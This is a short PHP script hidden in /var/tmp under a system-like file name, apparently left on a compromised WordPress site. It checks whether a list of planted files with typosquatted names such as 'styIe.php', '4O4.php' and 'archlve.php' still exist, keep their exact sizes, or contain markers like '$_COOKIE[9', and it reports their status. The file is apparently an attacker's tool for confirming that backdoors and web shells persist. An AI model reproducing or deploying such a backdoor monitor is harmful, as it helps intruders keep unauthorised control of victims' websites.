File: //var/tmp/.ob_iconv_handle
<?php $r = '/home/stancato/stancato'; $x = ["/wp-includes/widgets/class-wp-widget-recent-comments.php"=>"bd@@377896@@$_COOKIE[9",
"/wp-content/themes/custom-file-5-1748027075/4O4.php"=>"bd@@264450@@727",
"/cbbaad.php"=>"bd@@16737@@105",
"/wp-content/themes/custom_file_3_1748022647/styIe.php"=>"bd@@258926@@727",
"/index.php"=>"bd@@779682@@405",
"/886d35.php"=>"bd@@86965@@105",
"/wp-content/themes/comment_section_1748020200/archlve.php"=>"bd@@734905@@727",
"/wp-includes/blocks/query-title.php"=>"bd@@207062@@Sec-Websocket-Accept",
"/wp-content/themes/astra/inc/customizer/custom-controls/index.php"=>"bd@@614378@@461"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');